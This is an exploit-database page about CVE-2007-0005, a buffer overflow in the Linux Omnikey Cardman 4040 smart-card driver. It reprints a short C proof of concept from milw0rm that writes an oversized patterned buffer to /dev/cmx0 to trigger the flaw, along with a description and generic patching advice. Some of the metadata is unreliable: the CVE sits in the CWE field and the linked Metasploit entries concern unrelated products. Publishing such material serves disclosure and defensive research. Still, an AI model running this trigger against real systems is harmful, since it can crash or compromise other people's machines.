header-logo
Suggest Exploit
vendor:
Omnikey Cardman 4040 driver
by:
Daniel Roethlisberger
7.5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Omnikey Cardman 4040 driver
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2007-0005
CPE: o:linux:linux_kernel (assuming this exploit targets the Linux kernel)
Metasploit: https://www.rapid7.com/db/vulnerabilities/vmsa-2010-0005-cve-2009-3885/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0602/https://www.rapid7.com/db/vulnerabilities/vmsa-2010-0005-cve-2007-6286/https://www.rapid7.com/db/vulnerabilities/vmsa-2010-0005-cve-2007-5333/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2008-0006/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0004/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0006/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0007/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0008/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0009/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2008-0004/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2008-0008/https://www.rapid7.com/db/vulnerabilities/vmsa-2010-0005-cve-2007-5342/https://www.rapid7.com/db/vulnerabilities/vmsa-2008-0005-cve-2007-5618-workstation/https://www.rapid7.com/db/vulnerabilities/vmsa-2008-0005-cve-2007-5618-player/https://www.rapid7.com/db/vulnerabilities/vmsa-2010-0005-cve-2007-5461/https://www.rapid7.com/db/vulnerabilities/vmsa-2008-0005-cve-2007-5269-player/https://www.rapid7.com/db/vulnerabilities/vmsa-2008-0005-cve-2007-5269-workstation/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2008-0005/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0005/https://www.rapid7.com/db/?q=CVE-2007-0005&type=&page=2https://www.rapid7.com/db/?q=CVE-2007-0005&type=&page=2
Other Scripts:
Platforms Tested: Linux (mentioned in the code)
2007

Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005)

The Linux Omnikey Cardman 4040 driver has a buffer overflow vulnerability. This vulnerability allows an attacker to execute arbitrary code or crash the system by sending a specially crafted input to the driver.

Mitigation:

To mitigate this vulnerability, users should apply the latest security patches for the affected driver. It is also recommended to keep the system up-to-date with the latest software updates and security patches.
Source

Exploit-DB raw data:

/*
 * Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005)
 * Copyright (C) Daniel Roethlisberger <daniel.roethlisberger@csnc.ch>
 * Compass Security Network Computing AG, Rapperswil, Switzerland.
 * All rights reserved.
 * http://www.csnc.ch/
 */

#include<sys/stat.h>
#include<fcntl.h>
#include<unistd.h>
#include<stdlib.h>
#include<stdio.h>
#include<string.h>
#include<errno.h>

int main(int argc, char *argv[]) {
   int fd, i, n;
   char buf[8192];

   /*
    * 0  1  2  3  4  5  6  7  8  9  a  b  c  d  e  f  ...
    * 00 01 00 02 00 03 00 04 00 05 00 06 00 07 00 08 ...
    */
   for (i = 0; i < sizeof(buf); i += 2) {
       buf[i]   = (char)(((i/2) & 0xFF00) >> 8);
       buf[i+1] = (char) ((i/2) & 0x00FF);
   }

   if ((fd = open("/dev/cmx0", O_RDWR)) < 0) {
       printf("Error: open() => %s\n", strerror(errno));
       exit(errno);
   }
   if ((n = write(fd, buf, sizeof(buf))) < 0) {
       printf("Error: write() => %s\n", strerror(errno));
       exit(errno);
   }
   printf("%d of %d bytes written\n", n, sizeof(buf));
   exit(0);
}

// milw0rm.com [2007-03-09]

Navigation

Suggest Exploit

Services By CQR